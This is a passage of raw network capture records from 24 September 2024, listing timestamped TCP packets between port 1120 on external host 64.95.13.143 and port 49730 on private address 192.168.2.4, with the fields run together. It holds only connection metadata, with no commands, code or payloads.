Sep 24, 2024 17:46:11.951477051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951478958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951483011 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951488972 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.951512098 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.951538086 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:11.952178001 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.952184916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:11.952224970 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.004399061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.004415989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.004441977 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.004447937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.004460096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.004466057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.004537106 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.004581928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.005959988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.005971909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.006027937 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.033792973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.033838034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.033863068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.033871889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.033885956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.033893108 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.033909082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.033947945 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.033983946 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.035764933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.035823107 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.035913944 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.035953045 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.035962105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.035969973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.035983086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.035991907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.035996914 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036001921 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036010981 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036014080 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036020041 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036029100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036047935 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036051989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036062956 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036065102 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036073923 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036084890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036098003 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036113024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036118984 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036130905 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036134005 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036147118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036159992 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036163092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036173105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036190033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036202908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036204100 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036218882 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036233902 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036241055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036257029 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036262035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036262989 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036277056 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036281109 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036286116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036293983 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.036305904 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.036338091 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.037139893 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037151098 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037163973 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037169933 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037175894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037188053 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037194014 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037206888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037211895 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037218094 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.037218094 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.037239075 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.037261009 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.038034916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038043022 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038053036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038059950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038077116 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038081884 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038088083 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038093090 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.038094997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038101912 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038114071 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038120031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038131952 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.038162947 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.038942099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038953066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038959026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038969994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038975954 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038983107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.038994074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039006948 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.039006948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039016008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039020061 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.039024115 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039036989 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039046049 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.039067030 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.039813042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039824963 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039829969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039835930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039846897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039858103 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039860964 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.039860964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039871931 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039875031 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.039879084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039890051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039891958 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039895058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.039907932 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.039932013 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.040705919 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040725946 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040733099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040745020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040750027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040755987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040756941 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.040761948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040769100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040781021 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040786982 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040791988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.040792942 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.040827036 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.041502953 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041512012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041522980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041529894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041541100 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041547060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041553020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041563988 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041568995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041574955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041574955 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.041587114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041594028 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041596889 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.041605949 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041613102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041616917 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.041620016 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.041635990 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.041649103 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.091888905 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.096986055 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.096997976 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.097012043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.097045898 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.097052097 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.097064972 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.097103119 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.097179890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.097187996 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.097199917 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.097225904 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.097251892 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.097508907 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.124469995 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.124485970 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.124491930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.124502897 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.124509096 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.124515057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.124526978 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.124533892 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.124540091 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.124540091 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.124600887 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.126920938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.126967907 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.126988888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.126995087 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127043009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127043009 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.127048969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127059937 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127085924 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.127262115 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127304077 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.127324104 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127330065 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127341986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127346992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127361059 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.127403975 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.127583027 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127588987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127599955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127605915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127612114 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127618074 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127624989 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.127666950 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.127959967 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127965927 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127970934 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127976894 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127981901 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127986908 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.127994061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128009081 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.128031015 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.128500938 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128506899 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128511906 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128518105 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128528118 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128534079 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128544092 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.128544092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128551006 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128563881 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.128576040 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.128601074 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.129141092 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129153013 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129163980 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129168987 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129187107 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129189968 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.129193068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129206896 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129211903 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129216909 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129221916 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129223108 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.129232883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129239082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129239082 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.129245043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.129261017 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.129276991 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.130031109 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130037069 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130048037 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130053043 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130058050 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130063057 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130074024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130079031 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130095959 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130098104 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.130099058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130109072 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130119085 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130120993 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130127907 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.130141020 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.130166054 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.130985975 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.130992889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131004095 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131009102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131015062 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131026030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131031036 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131036997 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131047010 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.131047964 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131053925 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131057024 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.131066084 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131072044 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131077051 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131078959 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.131083012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131093979 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131098986 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.131120920 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.131146908 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.131933928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131939888 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131951094 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131957054 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131962061 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131973028 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131978035 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131983042 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131989002 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131992102 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.131994009 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.131999969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132005930 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132006884 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.132011890 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132042885 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.132065058 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.132581949 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132662058 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132667065 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132678986 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132683992 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132688999 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132694960 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132699966 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.132714033 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.132746935 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.133120060 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.133126020 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.133136034 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.133141994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.133152008 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.133157969 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.133164883 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.133169889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.133178949 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.133191109 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.133213043 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.191380024 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.191420078 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.191435099 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.191446066 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.191452026 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.191457033 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.191462994 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.191484928 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.191541910 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.191636086 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.191692114 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.217201948 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.217212915 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.217220068 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.217266083 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.217456102 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.217462063 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.217473030 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.217478991 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.217556000 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.219846010 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.219960928 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.219980955 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.219990015 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220004082 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220011950 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220020056 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220047951 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.220066071 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.220284939 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220292091 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220304012 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220310926 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220335960 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.220347881 CEST497301120192.168.2.464.95.13.143
Sep 24, 2024 17:46:12.220563889 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220580101 CEST11204973064.95.13.143192.168.2.4
Sep 24, 2024 17:46:12.220594883 CEST11204973064.95.13.143192.168.2.4
